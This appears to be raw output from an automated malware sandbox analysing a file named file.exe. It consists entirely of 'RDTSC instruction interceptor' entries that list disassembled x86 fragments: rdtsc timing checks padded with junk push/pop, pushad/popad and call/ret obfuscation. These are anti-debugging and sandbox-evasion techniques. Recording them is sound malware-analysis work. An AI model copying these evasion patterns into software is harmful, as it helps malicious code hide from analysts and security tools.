Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7ECE second address: 8C7EE4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7EE4 second address: 8C7EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7EE8 second address: 8C7EEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7EEE second address: 8C7F06 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9820CD6B98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jc 00007F9820CD6BA4h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7F93 second address: 8C7FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F98219BDB66h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F98219BDB66h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 jno 00007F98219BDB70h 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push esi 0x00000022 jmp 00007F98219BDB75h 0x00000027 pop esi 0x00000028 mov eax, dword ptr [eax] 0x0000002a jns 00007F98219BDB76h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7FF7 second address: 8C7FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C7FFB second address: 8C800C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C800C second address: 8C8012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8012 second address: 8C8057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c mov edx, dword ptr [ebp+122D2C77h] 0x00000012 mov dword ptr [ebp+122D2FEEh], edi 0x00000018 push 00000003h 0x0000001a or dword ptr [ebp+122D1809h], esi 0x00000020 push 00000000h 0x00000022 xor dword ptr [ebp+122D1BD3h], edx 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D2C2Fh] 0x00000030 push 40A0BF69h 0x00000035 pushad 0x00000036 jg 00007F98219BDB6Ch 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8057 second address: 8C805F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C805F second address: 8C8063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8174 second address: 8C81D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 11A90114h 0x0000000e add dh, 00000046h 0x00000011 mov cx, 985Eh 0x00000015 lea ebx, dword ptr [ebp+12449DC0h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F9820CD6B98h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 sbb cx, CB3Bh 0x0000003a mov ecx, eax 0x0000003c xchg eax, ebx 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F9820CD6BA8h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C822F second address: 8C8239 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8239 second address: 8C823E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C823E second address: 8C82AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F98219BDB75h 0x0000000d nop 0x0000000e sbb dx, EC67h 0x00000013 mov dh, cl 0x00000015 push 00000000h 0x00000017 pushad 0x00000018 mov ah, dh 0x0000001a popad 0x0000001b call 00007F98219BDB69h 0x00000020 jnp 00007F98219BDB72h 0x00000026 jnl 00007F98219BDB6Ch 0x0000002c push eax 0x0000002d push ecx 0x0000002e jmp 00007F98219BDB74h 0x00000033 pop ecx 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jl 00007F98219BDB66h 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82AA second address: 8C82AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82AF second address: 8C82D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F98219BDB73h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jns 00007F98219BDB66h 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82D4 second address: 8C82F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82F2 second address: 8C82FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82FB second address: 8C82FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82FF second address: 8C83A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov di, BD05h 0x0000000c call 00007F98219BDB78h 0x00000011 sub dword ptr [ebp+122D1C27h], esi 0x00000017 pop edi 0x00000018 push 00000003h 0x0000001a mov esi, 0D4D026Fh 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 jmp 00007F98219BDB6Eh 0x00000027 pop edi 0x00000028 mov esi, 1BB4697Fh 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F98219BDB68h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 and si, 2E5Ah 0x0000004e mov dword ptr [ebp+122D1B37h], ebx 0x00000054 call 00007F98219BDB69h 0x00000059 push ebx 0x0000005a jg 00007F98219BDB72h 0x00000060 pop ebx 0x00000061 push eax 0x00000062 jng 00007F98219BDB78h 0x00000068 push eax 0x00000069 push edx 0x0000006a je 00007F98219BDB66h 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C83A2 second address: 8C83A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C83A6 second address: 8C83C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98219BDB74h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C83C6 second address: 8C83CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C83CD second address: 8C8405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F98219BDB72h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F98219BDB76h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8405 second address: 8C8467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F9820CD6B98h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 stc 0x00000023 jmp 00007F9820CD6BA8h 0x00000028 mov si, ED41h 0x0000002c lea ebx, dword ptr [ebp+12449DCBh] 0x00000032 or dword ptr [ebp+122D33A0h], edi 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F9820CD6BA2h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8467 second address: 8C8471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F98219BDB66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8471 second address: 8C8475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8475 second address: 8C8488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F98219BDB68h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8488 second address: 8C848E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E70C7 second address: 8E70D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E70D3 second address: 8E70EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnc 00007F9820CD6B96h 0x00000013 je 00007F9820CD6B96h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7767 second address: 8E777D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB72h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E792D second address: 8E7931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7931 second address: 8E793D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A4F second address: 8E7A59 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9820CD6B96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A59 second address: 8E7A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c jng 00007F98219BDB70h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A75 second address: 8E7A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA7h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A91 second address: 8E7A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A97 second address: 8E7A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7B8D second address: 8E7B97 instructions: 0x00000000 rdtsc 0x00000002 je 00007F98219BDB66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7B97 second address: 8E7BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9820CD6B9Ah 0x0000000b jnc 00007F9820CD6B98h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F9820CD6BB3h 0x0000001a jmp 00007F9820CD6BA7h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7BD1 second address: 8E7BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F98219BDB6Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7D2F second address: 8E7D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7E80 second address: 8E7EA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jnc 00007F98219BDB66h 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD219 second address: 8DD251 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9820CD6B96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9820CD6BA9h 0x00000013 jmp 00007F9820CD6BA1h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E86F3 second address: 8E86FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E86FD second address: 8E870A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8ACA second address: 8E8B0B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F98219BDB66h 0x00000008 jp 00007F98219BDB66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jng 00007F98219BDB66h 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop ebx 0x0000001c jnc 00007F98219BDB85h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF220 second address: 8BF225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED125 second address: 8ED12F instructions: 0x00000000 rdtsc 0x00000002 je 00007F98219BDB6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED723 second address: 8ED729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC68B second address: 8EC69E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F98219BDB6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F43A0 second address: 8F43BF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9820CD6BB1h 0x00000008 jmp 00007F9820CD6BA5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F43BF second address: 8F43D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F98219BDB86h 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F98219BDB66h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F396A second address: 8F3976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9820CD6B96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3976 second address: 8F397C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F397C second address: 8F3985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3985 second address: 8F3997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3997 second address: 8F399B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F399B second address: 8F39A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F39A9 second address: 8F39B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6B9Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F39B8 second address: 8F39C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F98219BDB6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3AFE second address: 8F3B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9820CD6B9Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F407B second address: 8F4081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4081 second address: 8F408D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9820CD6BB1h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4206 second address: 8F4231 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F98219BDB7Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F98219BDB76h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4231 second address: 8F4237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F50E6 second address: 8F50EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F517B second address: 8F51B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F9820CD6B9Ch 0x0000000d pop edx 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push edi 0x00000014 jmp 00007F9820CD6B9Fh 0x00000019 pop edi 0x0000001a push ebx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 ja 00007F9820CD6B98h 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F51B8 second address: 8F5213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F98219BDB6Ah 0x0000000f pop eax 0x00000010 je 00007F98219BDB7Ch 0x00000016 jmp 00007F98219BDB76h 0x0000001b call 00007F98219BDB69h 0x00000020 push edi 0x00000021 jmp 00007F98219BDB6Bh 0x00000026 pop edi 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F98219BDB71h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5213 second address: 8F524D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F9820CD6B96h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnc 00007F9820CD6B9Eh 0x00000018 mov eax, dword ptr [eax] 0x0000001a jno 00007F9820CD6B9Eh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 push edi 0x00000028 pop edi 0x00000029 pop ecx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F53BF second address: 8F53C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F56FD second address: 8F5703 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5EE1 second address: 8F5F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 ja 00007F98219BDB66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F98219BDB68h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b push eax 0x0000002c pushad 0x0000002d jmp 00007F98219BDB70h 0x00000032 pushad 0x00000033 jbe 00007F98219BDB66h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6217 second address: 8F621D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F621D second address: 8F6222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6222 second address: 8F6227 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
